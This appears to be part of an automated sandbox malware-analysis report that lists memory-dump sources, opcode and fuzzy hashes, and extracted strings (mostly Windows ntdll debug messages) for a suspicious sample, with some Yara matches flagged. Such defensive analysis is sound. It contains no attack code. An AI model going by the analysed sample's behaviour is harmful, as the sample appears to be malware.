                                                                                                                                                                                  • Instruction ID: d724d9fffd761ed11c3e9d9ef0538d556944bef641c12b00e4558159d1b0089f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CE0EC75954684AFDF52EF59C640F9EBBF9BB95B40F150058A2885B670C624A900CB50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                  • Instruction ID: 490a79f71bb84d1c0a54657ea538ddd5b4d642561c3c027ab697eb8b82800c0d
                                                                                                                                                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 91D02232713070D7DF2956656810FAB6905AB80A90F0E006C340AD3800C0048C83D6E0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                  • Instruction ID: 5c4ba68155f7b1a398a405a496c873d9d9e786e28e8585071ed07b3262730832
                                                                                                                                                                                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24D012771D054DBBCB119F66DC01F957BA9E764BA0F444020B508CB5A0C63AE950DA84
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cac98828292792e482f98f0bc37f585558dc58825c7c87b23cf95958ae23485e
                                                                                                                                                                                  • Instruction ID: 4e26c49ad70f26764f883365c69a60898a599845d3284b074dd3b3409fb3be92
                                                                                                                                                                                  • Opcode Fuzzy Hash: cac98828292792e482f98f0bc37f585558dc58825c7c87b23cf95958ae23485e
                                                                                                                                                                                  • Instruction Fuzzy Hash: B0D0A930601886CBEF2BCF18CA65EEE3AB0FB50640B8000BCE78092920E329EC41CB00
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                  • Instruction ID: 94632f2ed0829f50663fc9096ad14bcf75ce18d7547a77d1400a6f9ea069344b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                  • Instruction Fuzzy Hash: 12D09235212A80CFDB5A8B0DC5A4B1533E8BB44B44F8104D0E482CBB66D628D980DA00
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                  • Instruction ID: a1985ea5c0d57be430d91f5139e41928eb4648fe1ca8925920bfff9398589c5e
                                                                                                                                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                  • Instruction Fuzzy Hash: FAC01232150648AFC7119A95CD01F4177A9E798B40F000021F2048B570C531E810EA44
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                  • Instruction ID: 16dd6114044ad26a714ad8234e7409a4cfa9bbbca9be4388123f7b875a13565e
                                                                                                                                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2ED0123710024CEFCB01DF81C890D9A772AFBD8710F508019FD190B610CA31ED62DA50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                  • Instruction ID: 1ea1778e9b96d20009e40dfcb960291ce7e0b7502d600522673fa3cd392739f3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                  • Instruction Fuzzy Hash: 43C04C75701A458FCF15DB29D2A4F4577E4F744740F1518D0E945CF721E624E801DA10
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2cfe9f98633521cb04237dc7a34a87c7a369b52c89a923c0741f835a12128853
                                                                                                                                                                                  • Instruction ID: ed5a516fa6b38b7f2f1d80e13d65822a27558f884b6d789d2e74400fe52d2c97
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cfe9f98633521cb04237dc7a34a87c7a369b52c89a923c0741f835a12128853
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8690023560591012A140715C88845464015A7E0301B55C012E0824554CCA148A565362
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: afc980b3b0bd713822c0f40b15fdcbed85530554c5deb1e31f024653e464be14
                                                                                                                                                                                  • Instruction ID: b50b7bbfca148bafb12487d1d1b6c65ebec9e1a8ee3b04032b9aafd3d8ad8af1
                                                                                                                                                                                  • Opcode Fuzzy Hash: afc980b3b0bd713822c0f40b15fdcbed85530554c5deb1e31f024653e464be14
                                                                                                                                                                                  • Instruction Fuzzy Hash: 45900265601610425140715C88044066015A7E1301395C116E0954560CC6188955936A
Memory Dump Source
• Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
                                                                                                                                                                                  • Instruction ID: 28de6fa8172aaebe58d266d7ae12fb865f6b674d50dddbd06ccadf8cb1d59fba
                                                                                                                                                                                  • Opcode Fuzzy Hash: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0790023520151842E100715C8404B46001597E0301F55C017E0524654DC615C9517622
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
                                                                                                                                                                                  • Instruction ID: fed4dc03e18a5f70cfd9e0343e8a1d65693b43233959d44e72e06ef4d0de5170
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3690023520151402E100759C9408646001597E0301F55D012E5424555EC66589916232
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
                                                                                                                                                                                  • Instruction ID: 28d2a9a8d34ba67b946ae3d78dbaeda62468b16f615ce5fd5bf5f0127c4643f8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8990022560551402E140715C9418706002597D0201F55D012E0424554DC6598B5567A2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
                                                                                                                                                                                  • Instruction ID: 2c0da6c6c4ba95a3ff2d16b361e3a7cc1502462fcca474ee28911a75cc220433
                                                                                                                                                                                  • Opcode Fuzzy Hash: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C90023520151403E100715C9508707001597D0201F55D412E0824558DD65689516222
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
                                                                                                                                                                                  • Instruction ID: 10dc08da85576375132361fd9ff1884ef651609ae1adb715fbb76964588ed284
                                                                                                                                                                                  • Opcode Fuzzy Hash: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
                                                                                                                                                                                  • Instruction Fuzzy Hash: C790026534151442E100715C8414B060015D7E1301F55C016E1464554DC619CD526227
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
                                                                                                                                                                                  • Instruction ID: 552f532c1675269c3b3b5824642c33acef3bd1e139ee3a15d1006b619f1bd633
                                                                                                                                                                                  • Opcode Fuzzy Hash: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
                                                                                                                                                                                  • Instruction Fuzzy Hash: ED90047531151043F104715CC4047070055D7F1301F55C013F3554554CC53DCD715337
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
                                                                                                                                                                                  • Instruction ID: fa4645ee22d2b2d1daa6b35222647d3a2351f61f11ef2b2a6cf40949d43d66df
                                                                                                                                                                                  • Opcode Fuzzy Hash: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A90023520191402E100715C881470B001597D0302F55C012E1564555DC62589516672
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: baf3db33e038aba8c706569ee8ace855abc613a7f98a29aab5352f277aef823a
                                                                                                                                                                                  • Instruction ID: 15ccf085ea955a9f8cf04d686fd7131f5c102fe7d2daacf0ffed59c704dd16b3
                                                                                                                                                                                  • Opcode Fuzzy Hash: baf3db33e038aba8c706569ee8ace855abc613a7f98a29aab5352f277aef823a
                                                                                                                                                                                  • Instruction Fuzzy Hash: B790023520191402E100715C8808747001597D0302F55C012E5564555EC665C9916632
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1b97a59ccf8e7fea65267712fbd286b6411270be9fff84a2cf951bc2b41b8717
                                                                                                                                                                                  • Instruction ID: bd63e9d360c8fc32940e01b5e3bfe276d81c83880dc6b2e3e915f593f13d48ff
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b97a59ccf8e7fea65267712fbd286b6411270be9fff84a2cf951bc2b41b8717
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F900225601510425140716CC8449064015BBE1211755C122E0D98550DC55989655766
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ea4bf5946d20526b400ab279e167b4e92acb0af8bf3038e54aa7ad10297ce80e
                                                                                                                                                                                  • Instruction ID: f9e4b64ccdf6de43697c09f54e28a01be5dd1c21a44b465b23d6e37b0fffc015
                                                                                                                                                                                  • Opcode Fuzzy Hash: ea4bf5946d20526b400ab279e167b4e92acb0af8bf3038e54aa7ad10297ce80e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 58900225211D1042E200756C8C14B07001597D0303F55C116E0554554CC91589615622
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4adf1199c8229ca7609497c7664ef9af2974efa09ed7442d1245d0463f0ca263
                                                                                                                                                                                  • Instruction ID: 59a296c1882d376c5ffca640d23a70516df835ee6199f4ea7046ba19122cb285
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4adf1199c8229ca7609497c7664ef9af2974efa09ed7442d1245d0463f0ca263
                                                                                                                                                                                  • Instruction Fuzzy Hash: B990022530151402E102715C84146060019D7D1345F95C013E1824555DC6258A53A233
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
• Instruction ID: 08e0d7b6c9eb29df1883b52f33894d38ec03fe4c886f20b7996825ad07aedf8d
• Opcode Fuzzy Hash: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
• Instruction Fuzzy Hash: BB51E5A5A00116BFDB51DB9C8C809BEFBF8BB08640B14816DF5D9D7A45D374DE048BA0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 70afcaf683a62cf522a4ecec2aac5b4b73974e654ccef254fbc376a2ef42ea10
• Instruction ID: 1a7d08cffb5de6faea4249717a3473130f4d0d32e7806a0f73c9f429f02c4ced
• Opcode Fuzzy Hash: 70afcaf683a62cf522a4ecec2aac5b4b73974e654ccef254fbc376a2ef42ea10
• Instruction Fuzzy Hash: 46510971A04745AEDB38EF5CC8909BFBBF8EF84200B448459E5DAD7689D7B4EA40C760
Strings
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010F46FC
• ExecuteOptions, xrefs: 010F46A0
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 010F4725
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 010F4742
• CLIENT(ntdll): Processing section info %ws..., xrefs: 010F4787
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 010F4655
• Execute=1, xrefs: 010F4713
Memory Dump Source
• Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 010F031E
                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010F02E7
                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010F02BD
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 010F7BAC
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 010F7B8E
                                                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 010F7B7F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010F728C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 010F72C1
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 010F72A3
                                                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 010F7294
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-
                                                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                  • API String ID: 0-1194432280
Strings
Memory Dump Source
• Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
Yara matches
Similarity
• API ID:
• String ID: !$x$ Z$*S$/K$0$8$8O$8^$;$=$?Q$E $Ew$G,$Ij$Jp$MH$Q$V$VV$Xl$[$kt$m=$q:$t$~"$3$i$n
• API String ID: 0-1445620207
Strings
Memory Dump Source
• Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
Yara matches
Similarity
• API ID:
• String ID: 6$O$S$\$s
• API String ID: 0-3854637164
Memory Dump Source
• Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                  • Opcode ID: c74a4fa132a45b5802e5695393bcbf915155c3a3052718cd5c5cd2e452b3aeb8
